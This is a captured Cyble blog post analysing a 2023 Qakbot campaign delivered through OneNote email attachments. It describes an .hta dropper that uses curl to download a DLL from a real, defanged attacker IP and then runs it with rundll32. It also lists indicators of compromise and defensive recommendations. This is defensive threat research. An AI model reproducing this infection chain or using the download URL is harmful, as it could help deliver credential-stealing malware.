blog.cyble.com
Open in
urlscan Pro
192.0.78.213
Public Scan
URL:
https://blog.cyble.com/2023/02/01/qakbots-evolution-continues-with-new-strategies/
Submission: On June 14 via manual from PH — Scanned from DE
Submission: On June 14 via manual from PH — Scanned from DE
Form analysis 3 forms found in the DOM
GET https://blog.cyble.com
<form class="hfe-search-button-wrapper" role="search" action="https://blog.cyble.com" method="get">
<div class="hfe-search-form__container" role="tablist">
<input placeholder="Search " class="hfe-search-form__input" type="search" name="s" title="Search" value="">
<button id="clear-with-button" type="reset">
<i class="fas fa-times" aria-hidden="true"></i>
</button>
<button class="hfe-search-submit" type="submit">
<i class="fas fa-search" aria-hidden="true"></i>
</button>
</div>
</form>GET https://blog.cyble.com
<form class="hfe-search-button-wrapper" role="search" action="https://blog.cyble.com" method="get">
<div class="hfe-search-form__container" role="tablist">
<input placeholder="Search Our Blog" class="hfe-search-form__input" type="search" name="s" title="Search" value="">
<button id="clear" type="reset">
<i class="fas fa-times clearable__clear" aria-hidden="true"></i>
</button>
</div>
</form><form id="jp-carousel-comment-form">
<label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label>
<textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..."></textarea>
<div id="jp-carousel-comment-form-submit-and-info-wrapper">
<div id="jp-carousel-comment-form-commenting-as">
<fieldset>
<label for="jp-carousel-comment-form-email-field">Email</label>
<input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-author-field">Name</label>
<input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-url-field">Website</label>
<input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field">
</fieldset>
</div>
<input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment">
</div>
</form>Text Content
Skip to content
Search for your darkweb exposure
Main Menu
* Home
* About Us
* Products
* Cyble Vision
* AmiBreached
* Cyble Hawk
* Odin (Internet Scanning)
* The Cyber Express
* Newsroom
* Research Reports
* Careers
* Partner with us
* Request Demo
QAKBOT’S EVOLUTION CONTINUES WITH NEW STRATEGIES
* February 1, 2023
THREAT ACTOR LEVERAGING MICROSOFT ONENOTE TO INFECT USERS
Threat Actors (TAs) continuously adopt new tactics for infecting users for
several reasons, including avoiding detection by anti-virus solutions,
increasing the likelihood of successful infections, and seeking the challenge of
creating new methods of infecting victims.
Recently, several malware families have been spotted using OneNote attachments
in their spam campaigns. OneNote is a powerful digital notebook tool offered by
Microsoft. It provides users with a centralized location to store their
thoughts, ideas, and notes in an organized manner.
In December, Trustwave discovered that Formbook malware was being delivered
through spam emails containing OneNote attachments. Since then, various malware
families, including Redline Stealer and Asyncrat, have started incorporating
OneNote attachments in their spam campaigns. Cyble Research Intelligence Labs
(CRIL) has also noticed that the Qakbot malware uses OneNote attachments in
their campaigns.
INITIAL INFECTION
The initial infection starts with a spam email containing a OneNote attachment.
When the user opens the attachment, it drops an embedded .hta file executed by
mstha.exe. This results in downloading a Qakbot DLL file, which is then executed
by rundll32.exe. The below figure shows the Qakbot delivery mechanism.
Figure 1: Qakbot delivery mechanism
TECHNICAL ANALYSIS
The spam email has a subject line “OFERTA PO# 000938883 NSS” and has a OneNote
attachment Named “ ApplicationReject_68390(Jan31).one”, as shown in Figure 2.
Figure 2: Initial Spam email containing OneNote file.
Technical Content! Subscribe to Unlock
Sign up and get access to Cyble Research and Intelligence Labs' exclusive
contents
Email
Unlock This Content
When the user opens the OneNote attachment, it shows a fake OneNote page that
appears to contain an attachment from the cloud. This page tricks the user into
double-clicking to view the attachment, which initiates the Qakbot infection
process.
The figure below shows the Fake OneNote Page.
Figure 3: Fake OneNote Page
After clicking the “open” button on the OneNote page, it silently drops a .hta
file named “attachment.hta” in the background and executes it using mshta.exe.
The figure below shows the content of the .hta file.
Figure 4: Source code of the.hta file
The .hta file contains two JavaScript and two VBscript and performs the
following operations when executed.
1. First, the JavaScript gets the obfuscated data from the <div> element and
stores it in a variable “content”.
2. The vbscript now creates an in-string value “Name” under the registry key
HKEY_CURRENT_USER\SOFTWARE\Firm\Soft and writes the obfuscated content
stored in the previous step.
3. Another JavaScript now reads the obfuscated content from the registry and
creates an anonymous function by using replace method.
The figure below shows the anonymous function.
Figure 5: An Anonymous function
* This JavaScript also calls the anonymous function by passing the url
“hxxp://77[.]75[.]230[.]128/19825[.]dat”as an argument to it.
* The anonymous function now creates a wscript.shell object and executes
curl.exe to download “19825.dat” file from the remote server and saves to
%Programdata% location as “121.png”. The “121.png” is a Qakbot DLL file that
will be executed using “rundll32.exe” by JavaScript.
* After execution, the last VBscript present in the .hta file deletes the
registry key “Name” and shows the fake message to the victim, as shown below.
Figure 6: Displaying a Fake message to the victims
The below figure shows the process tree of Qakbot. After executing the DLL file,
it injects malicious code into “wermger.exe” to perform stealing activities.
Figure 7: Qakbot Process tree.
Qakbot can steal sensitive information such as usernames, passwords, and cookies
from browsers and steals emails from an infected machine. It can also spread to
other devices within the network to deploy other malware families, such as
ransomware.
CONCLUSION
Qakbot is a Prevalent and constantly evolving malware that can have serious
consequences for its victims, such as financial fraud, identity theft, etc. In
this case, the Qakbot malware spreads via spam emails containing OneNote
attachments. Cyble Research Labs is monitoring the activity of Qakbot and will
continue to inform our readers about any updates promptly.
OUR RECOMMENDATIONS
* Do not open emails from unknown or unverified senders.
* Avoid downloading pirated software from unverified sites.
* Use strong passwords and enforce multi-factor authentication wherever
possible.
* Keep updating your passwords after certain intervals.
* Use reputed anti-virus solutions and internet security software packages on
your connected devices, including PCs, laptops, and mobile devices.
* Avoid opening untrusted links and email attachments without first verifying
their authenticity.
* Block URLs that could use to spread the malware, e.g., Torrent/Warez.
* Monitor the beacon on the network level to block data exfiltration by malware
or TAs.
* Enable Data Loss Prevention (DLP) Solutions on employees’ systems.
MITRE ATT&CK® TECHNIQUES
Tactic Technique ID Technique Name Initial AccessT1566PhishingExecution T1204
T1059
T1218
T1047User Execution
Command and Scripting Interpreter
Rundll32
Windows Management Instrumentation
Defense Evasion T1027 Obfuscated Files or Information Command and Control T1071
T1095 Application Layer Protocol
Non-Application Layer Protocol
INDICATORS OF COMPROMISE (IOCS)
Indicators Indicator
Type Description b53bc20c9191f83e511c617ec7b8a5e05d5b77be5a1e44276f8cae761010d7d7Sha256 Eml
Filef18f10f9b74b987bf98d163bdfb7b619dcb7b39b3349ae3ccdcc5f348d6e0c75Sha256 OneNote
File7a51e7dec2080d22fea9edd2757b68687a7ba8c4dd1ba83ea7e68dc73539134bSha256 .HTA
File26b4c1b52c357b6c876c28ccbe95b86f93767142c050952c92cd774cc7dd8d37Sha256 Qakbot
Dllhxxp://77[.]75[.]230[.]128/19825[.]dat URLDownload URL
RECENT BLOGS
THREAT ACTOR TARGETS RUSSIAN GAMING COMMUNITY WITH WANNACRY-IMITATOR
June 13, 2023
OVER 45 THOUSAND USERS FELL VICTIM TO MALICIOUS PYPI PACKAGES
June 9, 2023
UNMASKING THE DARKRACE RANSOMWARE GANG
June 8, 2023
PrevPreviousVector Stealer: A Gateway for RDP Hijacking
NextNew BATLoader Disseminates RATs and StealersNext
June 13, 2023
CRIL analyzes WannaCry-Imitator Ransomware, a phishing gaming site targeting the
Russian Gaming community
Read More »
June 9, 2023
Through the analysis of more than 160 malicious Python packages, CRIL reveals
insights into the threat landscape associated with Python packages.
Read More »
June 8, 2023
Cyble analyzes Darkrace, a new ransomware variant that shares similar
characteristics to LockBit Ransomware.
Read More »
About Us
Cyble is a global threat intelligence SaaS provider that helps enterprises
protect themselves from cybercrimes and exposure in the Darkweb. Its prime focus
is to provide organizations with real-time visibility to their digital risk
footprint.
Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been
recognized by Forbes as one of the top 20 Best Cybersecurity Start-ups To Watch
In 2020.
Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore,
Dubai and India, Cyble has a global presence. To learn more about Cyble,
visit www.cyble.com.
Cyble is a global threat intelligence SaaS provider that helps enterprises
protect themselves from cybercrimes and exposure in the Darkweb. Its prime focus
is to provide organizations with real-time visibility to their digital risk
footprint.
Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been
recognized by Forbes as one of the top 20 Best Cybersecurity Start-ups To Watch
In 2020.
Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore,
Dubai and India, Cyble has a global presence. To learn more about Cyble,
visit www.cyble.com.
Offices:
We’re remote-friendly, with office locations around the world:
San Francisco, Atlanta, Rome,
Dubai, Mumbai, Bangalore, Singapore, Jakarta, Sydney, and Melbourne.
UAE:
Cyble Middle East FZE
Suite 1702, Level 17,
Boulevard Plaza Tower 1,
Sheikh Mohammed Bin Rashid Boulevard,
Downtown Dubai, Dubai, UAE
contact@cyble.com
+971 (4) 4018555
USA :
Cyble, Inc.
11175 Cicero Drive
Suite 100
Alpharetta, GA 30022
contact@cyble.com
+1 678 379 3241
India:
Cyble Infosec India Private Limited
A 602, Rustomjee Central Park, Andheri Kurla Road Chakala,
Andheri (East), Maharashtra
Mumbai-400093, India
contact@cyble.com
+1 678 379 3241
Australia :
Cyble Pty Limited
Level 32, 367 Collins Street
Melbourne VIC 3000
Australia
contact@cyble.com
+61 3 9005 6934
Singapore:
Cyble Singapore Private Limited
38 North Canal Road, Singapore 059294
contact@cyble.com
+1 678 379 3241
© 2023. Cyble Inc. All Rights Reserved
Twitter Linkedin
Scroll to Top
Loading Comments...
Write a Comment...
Email Name Website
We use cookies to ensure that we give you the best experience on our website. If
you continue to use this site we will assume that you are happy with it.Ok
×
We Value Your Privacy
Settings
NextRoll, Inc. ("NextRoll") and our advertising partners use cookies and similar
technologies on this site and use personal data (e.g., your IP address). If you
consent, the cookies, device identifiers, or other information can be stored or
accessed on your device for the purposes described below. You can click "Allow
All" or "Decline All" or click Settings above to customize your consent.
NextRoll and our advertising partners process personal data to: ● Store and/or
access information on a device; ● Create a personalized content profile; ●
Select personalised content; ● Personalized ads, ad measurement and audience
insights; ● Product development. For some of the purposes above, our advertising
partners: ● Use precise geolocation data. Some of our partners rely on their
legitimate business interests to process personal data. View our advertising
partners if you wish to provide or deny consent for specific partners, review
the purposes each partner believes they have a legitimate interest for, and
object to such processing.
If you select Decline All, you will still be able to view content on this site
and you will still receive advertising, but the advertising will not be tailored
for you. You may change your setting whenever you see the Manage consent
preferences on this site.
Decline All
Allow All
Manage consent preferences